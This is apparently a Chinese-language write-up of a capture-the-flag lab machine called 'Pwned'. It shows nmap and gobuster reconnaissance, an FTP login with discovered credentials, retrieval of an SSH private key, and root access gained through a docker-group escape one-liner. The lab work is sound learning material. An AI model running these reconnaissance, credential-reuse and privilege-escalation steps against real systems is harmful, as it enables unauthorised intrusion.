0x01 信息收集 NMAP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 $ nmap -T5 -p- -sV -sC 192.168.56.3 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 17:21 CST Nmap scan report for 192.168.56.3 Host is up (0.0014s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA) | 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA) |_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Pwned....!! Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
分析攻击面
21端口,用nmap探测不允许匿名用户登录,就不去手试了。
22 ssh ,没有线索的话,只能爆破。
80 21,22没有线索估计也只能在http上找线索
HTTP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ gobuster dir -u http://192.168.56.3/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.56.3/ [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/21 17:22:44 Starting gobuster =============================================================== /nothing (Status: 301) /server-status (Status: 403) /hidden_text (Status: 301) =============================================================== 2020/07/21 17:23:29 Finished ===============================================================
/nothing是真的没有什么东西,作者没有骗人。hidden_text下面有一个secret.dic,下载下来一看,是些路径。恩,应该是目录字典。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ gobuster dir -u http://192.168.56.3/ -w ./secret.dic =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.56.3/ [+] Threads: 10 [+] Wordlist: ./secret.dic [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/21 17:24:22 Starting gobuster =============================================================== /pwned.vuln (Status: 301) =============================================================== 2020/07/21 17:24:22 Finished ===============================================================
访问这个路径:
嗯哼,有ftp的帐号密码了。
FTP 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 $ ftp 192.168.56.3 Connected to 192.168.56.3. 220 (vsFTPd 3.0.3) Name (192.168.56.3:vkk): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls drwxr-xr-x 2 0 0 4096 Jul 10 12:47 share ftp> cd share 250 Directory successfully changed. ftp> ls -rw-r--r-- 1 0 0 2602 Jul 09 15:05 id_rsa -rw-r--r-- 1 0 0 75 Jul 09 17:41 note.txt 226 Directory send OK. ftp> get id_rsa ftp> get note.txt ftp> quit 221 Goodbye.
这里下载的两个文件,都可能会在后续的流程中用到。
0x02 漏洞利用 下载到ssh私钥后,给600/400权限,但是不知道该私钥的用户名,不过通过查看note.txt后,可以看到一个英文名字。直接使用这个英文名作为用户名尝试登录。
1 2 3 4 5 6 7 8 9 10 11 chmod 600 id_rsa cat note.txt Wow you are here ariana won't happy about this note sorry ariana :( ssh -i id_rsa [email protected]
登录成功。
看文件权限没有能动手脚的地方。
这里重点关注
它表示的意思是执行变量msg值的程序,并将这个程序的错误输出重定向到/dev/null中
后来才和群大佬讨论交流才注意到,一开始误打误撞直接whoami就出结果了,没注意到这里(谢谢dis_大佬的解答
0x03 提权 docker组成员,直接使用docker组提权。
1 docker run -v /:/mnt --rm -it alpine chroot /mnt sh
